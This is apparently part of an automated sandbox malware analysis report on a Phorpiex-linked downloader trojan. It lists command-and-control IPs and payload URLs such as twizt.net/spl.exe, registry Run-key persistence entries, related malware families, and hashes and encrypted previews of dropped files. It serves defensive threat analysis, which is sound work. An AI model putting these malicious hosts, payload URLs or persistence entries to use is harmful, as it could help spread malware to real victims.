https://invity.io/buy-crypto | 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/2 | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/_2yk | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/1 | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/4 | sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.233.132.177/3 | sysbrapsvc.exe, 00000002.00000002.3863535540.00000000024DB000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/2: | sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/_3Yh | 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
89.236.219.106 | unknown | Uzbekistan | 39032 | ISPETCUZ | false
2.133.220.58 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | true
80.80.214.50 | unknown | Uzbekistan | 34718 | TPSUZ-ASUZ | false
91.202.233.141 | unknown | Russian Federation | 9009 | M247GB | false
187.250.131.80 | unknown | Mexico | 8151 | UninetSAdeCVMX | false
109.168.235.213 | unknown | Russian Federation | 12389 | ROSTELECOM-ASRU | false
5.219.253.209 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | false
217.164.211.207 | unknown | United Arab Emirates | 5384 | EMIRATES-INTERNETEmiratesInternetAE | false
111.9.3.39 | unknown | China | 9808 | CMNET-GDGuangdongMobileCommunicationCoLtdCN | false
91.92.206.184 | unknown | Iran (ISLAMIC Republic Of) | 12880 | DCI-ASIR | false
82.194.11.2 | unknown | Azerbaijan | 29584 | AZEDUNET-ASAZ | false
82.200.224.194 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | false
92.124.152.236 | unknown | Russian Federation | 12389 | ROSTELECOM-ASRU | false
87.237.239.65 | unknown | Uzbekistan | 39032 | ISPETCUZ | false
187.235.148.47 | unknown | Mexico | 8151 | UninetSAdeCVMX | false
212.154.184.158 | unknown | Kazakhstan | 50482 | KAZAKHTELECOM-ASKZ | false
102.130.192.212 | unknown | Angola | 37645 | ZAP-AngolaAO | false
2.190.51.122 | unknown | Iran (ISLAMIC Republic Of) | 12880 | DCI-ASIR | false
85.204.86.26 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | false
2.191.74.251 | unknown | Iran (ISLAMIC Republic Of) | 12880 | DCI-ASIR | false
89.249.62.87 | unknown | Russian Federation | 50164 | RFTV-ASRU | false
93.123.145.179 | unknown | Russian Federation | 35539 | INFOLINK-T-ASMoscowRussiaRU | false
201.171.26.123 | unknown | Mexico | 8151 | UninetSAdeCVMX | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
92.47.251.85 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | false
41.199.184.238 | unknown | Egypt | 36992 | ETISALAT-MISREG | false
88.135.33.186 | unknown | Iran (ISLAMIC Republic Of) | 50177 | SHETABIR | false
95.156.103.50 | unknown | Russian Federation | 12389 | ROSTELECOM-ASRU | false
5.235.233.254 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | false
93.117.37.145 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | false
185.215.113.66 | twizt.net | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
67.195.228.94 | mta7.am0.yahoodns.net | United States | 36647 | YAHOO-GQ1US | false
189.222.182.86 | unknown | Mexico | 8151 | UninetSAdeCVMX | true
100.82.121.252 | unknown | Reserved | 701 | UUNETUS | true
5.255.18.13 | unknown | Yemen | 30873 | PTC-YEMENNETYE | false
88.204.241.110 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | false
190.36.195.147 | unknown | Venezuela | 8048 | CANTVServiciosVenezuelaVE | false
89.106.236.58 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | false
193.233.132.177 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
89.219.223.67 | unknown | Iran (ISLAMIC Republic Of) | 12880 | DCI-ASIR | false
100.111.103.217 | unknown | Reserved | 701 | UUNETUS | false
82.194.10.40 | unknown | Azerbaijan | 29584 | AZEDUNET-ASAZ | false
84.53.244.106 | unknown | Russian Federation | 12389 | ROSTELECOM-ASRU | false
187.133.57.73 | unknown | Mexico | 8151 | UninetSAdeCVMX | false
89.236.218.241 | unknown | Uzbekistan | 39032 | ISPETCUZ | false
37.151.73.50 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | false
186.94.185.219 | unknown | Venezuela | 8048 | CANTVServiciosVenezuelaVE | false
189.186.73.73 | unknown | Mexico | 8151 | UninetSAdeCVMX | false
2.185.146.181 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | false
77.240.41.3 | unknown | Kazakhstan | 41371 | BIKADAKZ | false
146.70.53.161 | unknown | United Kingdom | 2018 | TENET-1ZA | false
89.218.238.106 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | false
92.47.124.54 | unknown | Kazakhstan | 9198 | KAZTELECOM-ASKZ | false
2.180.211.255 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | false
37.120.247.6 | unknown | Romania | 41984 | MCC-ASRO | false
94.141.69.176 | unknown | Uzbekistan | 47452 | IMAX-AS-UpstreamUztelecom-UZ | false
                                                IP
                                                10.102.10.21
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1438295
Start date and time: 2024-05-08 15:21:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@23/24@3/57
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 76
• Number of non-executed functions: 230
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.72.235.82
• Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, www.update.microsoft.com, ctldl.windowsupdate.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
Time | Type | Description
15:22:15 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysbrapsvc.exe
15:22:16 | API Interceptor | 2447431x Sleep call for process: sysbrapsvc.exe modified
15:22:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Service C:\Users\user\winploravr.exe
15:22:52 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Service C:\Windows\winploravr.exe
15:23:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Service C:\Users\user\winploravr.exe
15:23:37 | API Interceptor | 5x Sleep call for process: 1146722911.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
212.154.184.158 | SecuriteInfo.com.Trojan.Siggen21.19151.20597.8736.exe | malicious | Phorpiex |
2.133.220.58 | file.exe | malicious | Phorpiex |
109.168.235.213 | file.exe | malicious | Phorpiex |
5.219.253.209 | I7ldmFS13W.exe | malicious | Phorpiex |
111.9.3.39 | I7ldmFS13W.exe | malicious | Phorpiex |
80.80.214.50 | file.exe | malicious | Phorpiex |
91.92.206.184 | file.exe | malicious | Phorpiex |
82.194.11.2 | 957C4XK6Lt.exe | malicious | Phorpiex |
91.202.233.141 | I7ldmFS13W.exe | malicious | Phorpiex | 91.202.233.141/4
82.200.224.194 | I7ldmFS13W.exe | malicious | Phorpiex |
82.200.224.194 | o3N9Cy4cvC.exe | malicious | Phorpiex |
87.237.239.65 | file.exe | malicious | Phorpiex |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mta7.am0.yahoodns.net | SecuriteInfo.com.Win32.BotX-gen.31335.5127.exe | malicious | Tofsee | 67.195.204.73
mta7.am0.yahoodns.net | file.exe | malicious | Phorpiex | 67.195.228.111
mta7.am0.yahoodns.net | file.exe | malicious | Phorpiex | 98.136.96.77
mta7.am0.yahoodns.net | RqrQG7s66x.dll | malicious | Unknown | 67.195.204.79
mta7.am0.yahoodns.net | 3pYA64ZwEC.exe | malicious | Unknown | 98.136.96.77
mta7.am0.yahoodns.net | newtpp.exe | malicious | Phorpiex | 98.136.96.91
mta7.am0.yahoodns.net | 7b8wRbnmKu.exe | malicious | Unknown | 67.195.204.79
mta7.am0.yahoodns.net | file.msg.scr.exe | malicious | Unknown | 67.195.204.79
mta7.am0.yahoodns.net | l3Qj8QhTYZ.exe | malicious | Phorpiex | 98.136.96.76
mta7.am0.yahoodns.net | .exe | malicious | Unknown | 67.195.228.111
twizt.net | I7ldmFS13W.exe | malicious | Phorpiex | 185.215.113.66
twizt.net | 957C4XK6Lt.exe | malicious | Phorpiex | 185.215.113.66
twizt.net | spl.exe | malicious | Unknown | 185.215.113.66
twizt.net | spl.exe | malicious | Unknown | 185.215.113.66
twizt.net | http://twizt.net/spl.exe | malicious | Unknown | 185.215.113.66
twizt.net | http://twizt.net/spl.exe | malicious | Unknown | 185.215.113.66
twizt.net | XnUEBMnOEd.exe | malicious | Unknown | 185.215.113.66
twizt.net | XnUEBMnOEd.exe | malicious | Unknown | 185.215.113.66
twizt.net | Document.doc.lnk | malicious | MalLnk | 185.215.113.66
twizt.net | Document.doc.lnk | malicious | MalLnk | 185.215.113.66
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ISPETCUZ | file.exe | malicious | Phorpiex | 217.30.163.6
ISPETCUZ | file.exe | malicious | Phorpiex | 89.236.216.14
ISPETCUZ | file.exe | malicious | Phorpiex | 217.30.163.15
ISPETCUZ | 3A1J69z1t7.elf | malicious | Mirai | 217.30.172.124
ISPETCUZ | mKVBAPvSpM.exe | malicious | Phorpiex | 217.30.160.221
ISPETCUZ | etiGLVC4Wj.elf | malicious | Mirai | 217.30.172.167
ISPETCUZ | GXKDh1UKH7.exe | malicious | Phorpiex | 87.237.239.105
ISPETCUZ | file.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | 87.237.236.52
ISPETCUZ | TXh7zCXtrk.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | 87.237.236.52
ISPETCUZ | file.exe | malicious | Phorpiex, Xmrig | 217.30.169.113
TPSUZ-ASUZ | 957C4XK6Lt.exe | malicious | Phorpiex | 89.236.226.70
TPSUZ-ASUZ | file.exe | malicious | Phorpiex | 89.236.196.245
TPSUZ-ASUZ | 28SY8i9x72.elf | malicious | Mirai | 89.236.193.113
TPSUZ-ASUZ | ajNjvSIXbo.elf | malicious | Mirai | 89.236.193.105
TPSUZ-ASUZ | SecuriteInfo.com.Trojan.Siggen21.19151.20597.8736.exe | malicious | Phorpiex | 185.248.44.169
TPSUZ-ASUZ | 3X3LctXa5d.elf | malicious | Mirai | 62.209.149.254
TPSUZ-ASUZ | file.exe | malicious | Phorpiex | 89.236.196.245
TPSUZ-ASUZ | E-IMZO-v4.47.exe | malicious | Unknown | 89.236.209.82
TPSUZ-ASUZ | arm7.elf | malicious | Mirai | 89.236.243.97
TPSUZ-ASUZ | http://tzmk.uz/sitemapn/cs.php/?email=test.test@test.com | malicious | Unknown | 62.209.128.119
KAZTELECOM-ASKZ | I7ldmFS13W.exe | malicious | Phorpiex | 92.47.228.51
KAZTELECOM-ASKZ | 240506-b7lv1sfmcw_pw_infected.zip | malicious | Xmrig | 2.132.55.153
KAZTELECOM-ASKZ | 5d9fe2735d4399d98e6e6a792b1feb26d6f2d9a5d77944ecacb4b4837e5e5fca.zip | malicious | Xmrig | 95.57.233.38
KAZTELECOM-ASKZ | x86.elf | malicious | Unknown | 84.240.246.191
KAZTELECOM-ASKZ | L31owFeEHg.elf | malicious | Mirai | 147.30.189.71
KAZTELECOM-ASKZ | zWOxRE8mXb.elf | malicious | Mirai, Okiru | 2.132.64.107
KAZTELECOM-ASKZ | 3P4acRdms1.elf | malicious | Mirai | 178.91.19.72
KAZTELECOM-ASKZ | GSzQSyqWKB.elf | malicious | Mirai | 95.57.49.126
KAZTELECOM-ASKZ | spQm3NLQtH.elf | malicious | Unknown | 5.251.102.212
KAZTELECOM-ASKZ | ZMDO0vznFx.elf | malicious | Unknown | 5.76.224.127
M247GB | I7ldmFS13W.exe | malicious | Phorpiex | 91.202.233.141
M247GB | 20240506_120821.bat | malicious | Remcos, DBatLoader, PrivateLoader | 194.187.251.115
M247GB | 4ZgjosOSkq.elf | malicious | Mirai | 38.207.172.124
M247GB | http://movierr.site. | malicious | Unknown | 185.200.116.51
M247GB | bot.x86.elf | malicious | Mirai | 38.203.241.133
M247GB | bot.arm7.elf | malicious | Mirai | 158.46.140.162
M247GB | fatura.bat.exe | malicious | Remcos, PureLog Stealer | 194.187.251.115
M247GB | c8sDO7umrx.exe | malicious | CMSBrute | 31.14.252.98
M247GB | p67UidesWn.elf | malicious | Mirai | 38.202.251.236
M247GB | nU7Z8sPyvf.rtf | malicious | Remcos | 194.187.251.115
                                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\1245832676.exe | I7ldmFS13W.exe | malicious | Phorpiex |
C:\Users\user\AppData\Local\Temp\1146722911.exe | I7ldmFS13W.exe | malicious | Phorpiex |
C:\Users\user\AppData\Local\Temp\2303012543.exe | I7ldmFS13W.exe | malicious | Phorpiex |
C:\Users\user\AppData\Local\Temp\2006625995.exe | I7ldmFS13W.exe | malicious | Phorpiex |
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):81928
                                                                              Entropy (8bit):7.9977582028689165
                                                                              Encrypted:true
                                                                              SSDEEP:1536:pm0MZsv8GxSYZCQGoPTBygAku+XJIE+ch9tYoKRcw+RLJznfl0:p56QIQGoLBygAkMc2oKRcwYBfl0
                                                                              MD5:2FF2BB06682812EEB76628BFBE817FBB
                                                                              SHA1:18E86614D0F4904E1FE97198CCDA34B25AAB7DAE
                                                                              SHA-256:985DA56FB594BF65D8BB993E8E37CD6E78535DA6C834945068040FAF67E91E7D
                                                                              SHA-512:5CD3B5A1E16202893B08C0AE70D3BCD9E7A49197EBF1DED08E01395202022B3B6C2D8837196EF0415FEA6497D928B44E03544B934F8E062DDBB6C6F79FB6F440
                                                                              Malicious:false
                                                                              Preview:NGS!.......`.%X6I.4#.(Nr...*.FT>:hNGJ.7....8.....! DX..m.SX.;....=....q...z(s Q..#w.+W`.JVj.ee.;p.~....a3.._....,...8h.:...p<c..'C+...H.@9....7ag'.....s.D.Hg.;.G.lI.x.2.~...."e.G...p.420.f$..-*...>.No.7.#...#tv..[..d<.d....G......."..v5.#..c..|...]...r.W.p....~.%r.[hZ._.8...l.l?l2,.... ..t.n..1K....q.WpA..e rs .....?!9.....s.,i.}...G..:.x}. M..]:w..T......U+.v*.@V-.7.m.+....j!Lq.mJ.mVH...i......Y.....H..q...........[.J........G..........1..j\..Z.+J2[?...#..fzY...V...".9....(..U......W.I..J's..-OW.`....o.0.pm..R...Va.j..;......wm57*....i..Wy....s..e.s.Z....5{(.|.+.t.D.........o>.D.Qb.d..........W}...@.^=w%}..C?.2.EN4j..fi../...kOp.......p....Z.6.......I$.a.J....._../.0.2.....8.M...*J.0........y.!=...g[...v]c.@9...d.......^..H2..~l....(....p..c.-'.7J..a............g...P.....Y.....P....mt&./...btva...}..gfu;'........Z.~..[..V.n~5.R.k.M..@.q./.:..=..`:...G^..'C.T..<C.z.v...`.b=./>.&-U.|....p......j......M.,../.fW..O.4].9..D...-\F.'.b..O.Q...W
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9224
                                                                              Entropy (8bit):7.977416257764991
                                                                              Encrypted:false
                                                                              SSDEEP:192:pjMFUgMn+YaK7UiPMkwGRDIpEQjKn31QmvjgbLVa:pcx47vPdRjR31QmvUbLE
                                                                              MD5:4C12165BC335A32CB559C828484A86A6
                                                                              SHA1:C2E78C57F15A1A3A190BE415AAC3D1E3209CE785
                                                                              SHA-256:4831BD83C39EC9D898CCC1023858C81A03326B7C1C5DD8E24FDF9B2171707D1A
                                                                              SHA-512:F44DF78B6F16255496B2FA35E28C185011C2BEBF47730A68FD1369ABF87F390684A8786A167319319D14A12DA3768C1EDEF8E36037CDE339A1FFE8C62C3EA87B
                                                                              Malicious:false
                                                                              Preview:NGS!............tn..B...... mW.2...L..#:...~..1M.F.\T.O...m.../..<.....c.....C.;U.7.L4U.M,%.7.Z./N...[d......P.oS.\.M...\.rU.9y......BD.U..5.q..}.i....C.Bv..Zy]k...:..a.6.#}];).2..^".....iv...N...mo_A...._.z.#.Q~n..........ox..q...J.dQ!ys0...2-.N.d5:..A......Z.,sb.2...2.i1s.z..0.T..0.&.NQ'j<...B.[.p...y........;..H...0.<..yK.....k6G\l...NC...=.....c..t{.M..sT.h..Z.XlT..?S/Q0..L.........f.ZW,.M......if.. \AM.....F'b..h.lJ.>....x.....I.2.....Z..*X..eG....)W.8'.Q.L...T....c.=...>Dw.,.N.M?...0.....N.".!2 .`.._j8*.`......F.y$...D7....EjY.....O&.$..b..o+.zNAN.Meuume.BV..5.(.....%.V..hR....Yt.N...L(2=;..Dp.s..u..b..x.Al......|s..........,..d.2....-..E..`.......pw. .*..vh....+.GO>.. ....Ingx..CmFh{2..Z7.|..k..|.`{E..#..&V....V..)A.>..G>#.....(....#.,.#..>K....X..F=..p"i...e..h..p.....7...wmt..,.TN...U...I.~..,~..i.P~V}..fl.j7.z.._RJ....L..........dY...K......j<y...D.VTmT@......G....=.G....E..Q...l....k..>.n.......Q....i....^..a.4...|Qp^<..r4.
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):15104
                                                                              Entropy (8bit):7.9890048960040705
                                                                              Encrypted:false
                                                                              SSDEEP:384:ftmlGG+Pu/uXQUEjiLr3Jv20OBIsv/hwFepObA2Ii0c8whMu:VoGpXQFi3Jv20OCsvuQ32645
                                                                              MD5:A3E6EEAC83CB1FE25E107176B20CFAC3
                                                                              SHA1:944177D2FAF1D8082B61D04AA9892D4390D4E515
                                                                              SHA-256:BDA7446502602C2AD20D9F0CA1D1031B993C2ADCB12773D0AD85611354EA8964
                                                                              SHA-512:D0777594941613F7A26708250D4BAD6AE4E9335A8C159C6F1B629C6E29A6AE812CFC6FED014182B081961C0C8C59FC55A15D03A939C97CB7C4C1ECDF57555461
                                                                              Malicious:false
                                                                              Preview:K.#...yB..H.Iz....7.N.......Ml..C..P..o.).3....4....|b.b.a..j..=."p.x.......a.H'...v...n.....H?....?.FO.....sG..b....n.......[...d.O,F...c...Z......UP.|...`..q.%<aSd.../...vZ,..gxYg..|....L.t&.{.....=...r..%.M...G..o......H..]#.y|...X.L....."J.0.L0.....w.J......-F..._i.....E...t...:..7%....<.G_.....K........n7C!.......X..Y.....=.{..G.R.....s...w.!..0l..0[.!..^i..r.P.:X$B....(......<:.....&.a.xtQ.L...[.y...<1:8c....Ji{Cw).Vx..&.`[...g..F.........kW?.*....(...5p..n....H..$.~.vL%i.._.oZ4..S.*~R.6.0..i.[....y. ?JD.........!..sn.9a.....:.z.^.E...e'.4G~...*.U.LV..*<.`9o8......X..'.......63..d....d4...ki..Z.Y.!I........v..K.<i.....H6H.mMU.>.}L.&....0d..{......R.!.....A7.R..Z..i.("...;..b.%Y......0....#J..2@B.s...:...g...@....h.{.^..G.<.......[Y/x6s.*e.Z8..e......tZ......=N......O.`-...,..S..T..e..pH...7[.:w...f4.kE.5)...M.m.{:<...t..W.....;?.....U.`.y........E.*0.n.k......(D}..=O..LX.....9.i.,.,a~..p..Y..Z...A....../... q....D........_
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9224
                                                                              Entropy (8bit):7.977416257764991
                                                                              Encrypted:false
                                                                              SSDEEP:192:pjMFUgMn+YaK7UiPMkwGRDIpEQjKn31QmvjgbLVa:pcx47vPdRjR31QmvUbLE
                                                                              MD5:4C12165BC335A32CB559C828484A86A6
                                                                              SHA1:C2E78C57F15A1A3A190BE415AAC3D1E3209CE785
                                                                              SHA-256:4831BD83C39EC9D898CCC1023858C81A03326B7C1C5DD8E24FDF9B2171707D1A
                                                                              SHA-512:F44DF78B6F16255496B2FA35E28C185011C2BEBF47730A68FD1369ABF87F390684A8786A167319319D14A12DA3768C1EDEF8E36037CDE339A1FFE8C62C3EA87B
                                                                              Malicious:false
                                                                              Preview:NGS!............tn..B...... mW.2...L..#:...~..1M.F.\T.O...m.../..<.....c.....C.;U.7.L4U.M,%.7.Z./N...[d......P.oS.\.M...\.rU.9y......BD.U..5.q..}.i....C.Bv..Zy]k...:..a.6.#}];).2..^".....iv...N...mo_A...._.z.#.Q~n..........ox..q...J.dQ!ys0...2-.N.d5:..A......Z.,sb.2...2.i1s.z..0.T..0.&.NQ'j<...B.[.p...y........;..H...0.<..yK.....k6G\l...NC...=.....c..t{.M..sT.h..Z.XlT..?S/Q0..L.........f.ZW,.M......if.. \AM.....F'b..h.lJ.>....x.....I.2.....Z..*X..eG....)W.8'.Q.L...T....c.=...>Dw.,.N.M?...0.....N.".!2 .`.._j8*.`......F.y$...D7....EjY.....O&.$..b..o+.zNAN.Meuume.BV..5.(.....%.V..hR....Yt.N...L(2=;..Dp.s..u..b..x.Al......|s..........,..d.2....-..E..`.......pw. .*..vh....+.GO>.. ....Ingx..CmFh{2..Z7.|..k..|.`{E..#..&V....V..)A.>..G>#.....(....#.,.#..>K....X..F=..p"i...e..h..p.....7...wmt..,.TN...U...I.~..,~..i.P~V}..fl.j7.z.._RJ....L..........dY...K......j<y...D.VTmT@......G....=.G....E..Q...l....k..>.n.......Q....i....^..a.4...|Qp^<..r4.
                                                                              Process:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9224
                                                                              Entropy (8bit):7.977416257764991
                                                                              Encrypted:false
                                                                              SSDEEP:192:pjMFUgMn+YaK7UiPMkwGRDIpEQjKn31QmvjgbLVa:pcx47vPdRjR31QmvUbLE
                                                                              MD5:4C12165BC335A32CB559C828484A86A6
                                                                              SHA1:C2E78C57F15A1A3A190BE415AAC3D1E3209CE785
                                                                              SHA-256:4831BD83C39EC9D898CCC1023858C81A03326B7C1C5DD8E24FDF9B2171707D1A
                                                                              SHA-512:F44DF78B6F16255496B2FA35E28C185011C2BEBF47730A68FD1369ABF87F390684A8786A167319319D14A12DA3768C1EDEF8E36037CDE339A1FFE8C62C3EA87B
                                                                              Malicious:false
                                                                              Preview:NGS!............tn..B...... mW.2...L..#:...~..1M.F.\T.O...m.../..<.....c.....C.;U.7.L4U.M,%.7.Z./N...[d......P.oS.\.M...\.rU.9y......BD.U..5.q..}.i....C.Bv..Zy]k...:..a.6.#}];).2..^".....iv...N...mo_A...._.z.#.Q~n..........ox..q...J.dQ!ys0...2-.N.d5:..A......Z.,sb.2...2.i1s.z..0.T..0.&.NQ'j<...B.[.p...y........;..H...0.<..yK.....k6G\l...NC...=.....c..t{.M..sT.h..Z.XlT..?S/Q0..L.........f.ZW,.M......if.. \AM.....F'b..h.lJ.>....x.....I.2.....Z..*X..eG....)W.8'.Q.L...T....c.=...>Dw.,.N.M?...0.....N.".!2 .`.._j8*.`......F.y$...D7....EjY.....O&.$..b..o+.zNAN.Meuume.BV..5.(.....%.V..hR....Yt.N...L(2=;..Dp.s..u..b..x.Al......|s..........,..d.2....-..E..`.......pw. .*..vh....+.GO>.. ....Ingx..CmFh{2..Z7.|..k..|.`{E..#..&V....V..)A.>..G>#.....(....#.,.#..>K....X..F=..p"i...e..h..p.....7...wmt..,.TN...U...I.~..,~..i.P~V}..fl.j7.z.._RJ....L..........dY...K......j<y...D.VTmT@......G....=.G....E..Q...l....k..>.n.......Q....i....^..a.4...|Qp^<..r4.
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):101120
                                                                              Entropy (8bit):7.998324560926195
                                                                              Encrypted:true
                                                                              SSDEEP:3072:ylQk1QqImOYSPsra4ex/QySz0boQn6tmeVfa:Lk+qImOYtrazx6zcoQ6tmeVfa
                                                                              MD5:F7BD7349C6ADCD545464390D66B5FAC8
                                                                              SHA1:8D421E11DFE55E7BFFECDE4BDC215D934BD45F64
                                                                              SHA-256:65B1908907D7C09AFF6335C9B6DE0280E1D03345A95A04A8062C9068180CE018
                                                                              SHA-512:8873319FD39D17954337E4FE8EC4C09C273D458406B3672FCCA01418BF68E8BC962C53492A2EC88E5F9C4B3CFA98285711B2ACD76D4B18ADA9B981D82EBE5B63
                                                                              Malicious:false
                                                                              Preview:/.;."..~....%...n.8g.=Gg.h.$*..}^.S....S].....J."P.h...-....Q.y...022G.m.T.f..<...nd.1.?...^.R...B...x...lGU?..6...7....Gj.....<..h=.2..\...z.....R....9>`RQ ...3$.G.s..;.%.e...Ux..&....o[.x.Q..1..d..;..]o..i>B3`.........-........i.T...>MV/...._My..a.pxvB.u.=)esA9..l..=|....p...4N$h.....O`..; ...~...;.w_..7b.f...2....J..6...%...9.K2!.....P.ee.....Q...f.Y.wI.....f5.*.9....Bs.....:L7-..l.g.w../nlOsk,...c..$Mt...7=.PG...K..N.6.E..Dy!...Ig.6..Y..t7.exU]5...{Yl.+..5..Z....N....'."..'..zZ}K2~.:/.U..~1.\M...^..l..x..1M8...../.5...0.>f.{V....G%w.. ...u..VT.....o......=....?...Z.....U..c..~.t.M.t....o...|......;....q..{x...]+...^(....qp.m.KA...<q....v...v9'.b......T..../..G.p_.e......,...7...o.....s?g.&|.d.(..v[.d.........}..|X...a...1..j...v&......B.7j......\.o..|N!i/u....,.o#/..v..]..1....&.o.3.T...}.....l......{...fKV_E.-&.!.....1.~u.Z0}_....+_.i.|....s.V..!...B....[.@L;.;..l.e.....;f........G.r..<..i7.D.LP.`.}8..y.#..W.q.O......)h/...E
                                                                              Process:C:\Windows\sysbrapsvc.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):22272
                                                                              Entropy (8bit):7.991147590382041
                                                                              Encrypted:true
                                                                              SSDEEP:384:XD5E45+KzGUysR3CqHUbX+Sy1IRkFrSFGL+sL9wzzsVvh0vGDaAf5MLBy2wi:XD5E++Kqs5CZX+8QriGLTJwzzGvh0unu
                                                                              MD5:8529E7928CF84C780752624128CA7C40
                                                                              SHA1:20E9A4825C7B0B4648B645F757D1D3D24482576E
                                                                              SHA-256:DE98409082B36BDA87330EB30A310ABDB14394F762BDF18E4EF1C28A4DF8416F
                                                                              SHA-512:83DC247CCCB577ACA55A879B74E289B1CC6F170BC933BF026F77B97A33394DE77C72A4AEE761D1B9FBA89C24C21A7CF195DE42CE9F71184A0597F6C1ABF7D049
                                                                              Malicious:false
